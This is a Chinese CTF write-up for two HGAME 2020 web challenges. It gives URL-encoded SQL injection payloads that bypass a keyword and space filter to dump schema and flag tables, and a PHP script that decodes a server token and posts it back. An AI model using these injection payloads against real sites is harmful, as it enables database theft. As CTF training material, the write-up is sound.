HGAME2020-week2

Cosmos的留言板

web的一道sql注入题，这名字起得还以为是xss

首先fuzz发现过滤了一次select,空格过滤了

select可以双写绕过，空格用注释绕过,还有要进行url编码

1. 查数据库名

>>> urllib.parse.quote('\'/*1*/union/*1*/select/*1*/database();#')
'%27/%2A1%2A/union/%2A1%2A/select/%2A1%2A/database%28%29%3B%23'

2. 查表

>>> urllib.parse.quote('-1\'/**/union/**/seselectlect/**/group_concat(TABLE_NAME)/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA="easysql";#')
'-1%27/%2A%2A/union/%2A%2A/seselectlect/%2A%2A/group_concat%28TABLE_NAME%29/%2A%2A/from/%2A%2A/information_schema.TABLES/%2A%2A/where/%2A%2A/TABLE_SCHEMA%3D%22easysql%22%3B%23'

3. 查列

>>> urllib.parse.quote('-1\'/**/union/**/seselectlect/**/group_concat(COLUMN_NAME)/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA="easysql";#')
'-1%27/%2A%2A/union/%2A%2A/seselectlect/%2A%2A/group_concat%28COLUMN_NAME%29/%2A%2A/from/%2A%2A/information_schema.COLUMNS/%2A%2A/where/%2A%2A/TABLE_SCHEMA%3D%22easysql%22%3B%23'

4. flag

>>> urllib.parse.quote('-1\'/**/union/**/seselectlect/**/fl4444444g/**/from/**/f1aggggggggggggg;#')
'-1%27/%2A%2A/union/%2A%2A/seselectlect/%2A%2A/fl4444444g/%2A%2A/from/%2A%2A/f1aggggggggggggg%3B%23'

Cosmos的新语言

这些不是base64编码，看上面代码尝试访问mycode文件看到一段代码

function encrypt($str){
    $result = '';
    for($i = 0; $i < strlen($str); $i++){
        $result .= chr(ord($str[$i]) + 1);
    }
    return $result;
}

echo(strrev(base64_encode(base64_encode(strrev(encrypt(str_rot13(str_rot13(str_rot13(base64_encode(strrev($_SERVER['token'])))))))))));

if(@$_POST['token'] === $_SERVER['token']){
    echo($_SERVER['flag']);
}

这段代码就是加密代码了，但是这里有个坑。。 就是加密代码会变！。。。

解题脚本:

<?php
/**
 * 发送post请求
 * @param string $url 请求地址
 * @param array $post_data post键值对数据
 * @return string
 */
function send_post($url, $post_data) {
  $postdata = http_build_query($post_data);
  $options = array(
    'http' => array(
      'method' => 'POST',
      'header' => 'Content-type:application/x-www-form-urlencoded',
      'content' => $postdata,
      'timeout' => 15 * 60 // 超时时间（单位:s）
    )
  );

  $context = stream_context_create($options);
  $result = file_get_contents($url, false, $context);
  
  return $result;
}

/**
 * 解密模块1
 * @param string $str 待解密字符串
 * @return string 
 */
function decrypt1($str){
    $deresult = '';
    for($i = 0; $i < strlen($str); $i++){
        $deresult .= chr(ord($str[$i]) - 1);
    }
    return $deresult;
}

/**
 * 获取网页内容
 * @param string $url 网页url
 * @return string 
 */
function getHTML($url){
    // 获取网页内容
    //echo $fh;
    // 正则过滤内容
    //$pattern='/code><br>(.*)<br>/s';  //小写s：将转义回车取消视为单行匹配
    //preg_match($pattern,$fh,$match_result); //  返回的match_result 是一个数组
    //print_r($match_result);
    //return $match_result[1];
    $token=file_get_contents($url);
    $token=explode("\n", $token);
    $token=substr($token[4], 0, -4);
    $token=html_entity_decode($token);
    return $token;
}

/**
 * 解密模块
 * @param string $url 网页网址
 *
 */
function Decrypt($url){    
    $token=getHTML($url); // 获取编码
    $op_function=file_get_contents($url . '/mycode');
    $op_function=explode("\n", $op_function)[8];
    $op_function=explode('(', $op_function);
    $op_function=array_slice($op_function, 1, 10);
    foreach($op_function as $value){
        switch($value){
        case 'base64_encode':
            $token=base64_decode($token);
            break;
        case 'str_rot13':
            $token=str_rot13($token);
            break;
        case 'encrypt':
            $token=decrypt1($token);
            break;
        case 'strrev':
            $token=strrev($token);
            break;
        }
    }
    return $token;
}

$url="http://6a72f6c03d.php.hgame.n3ko.co";
$payload=Decrypt($url);

$post_data = array(
  'token' => $payload
); // 构造数据

echo(send_post($url, $post_data));  //提交数据

?>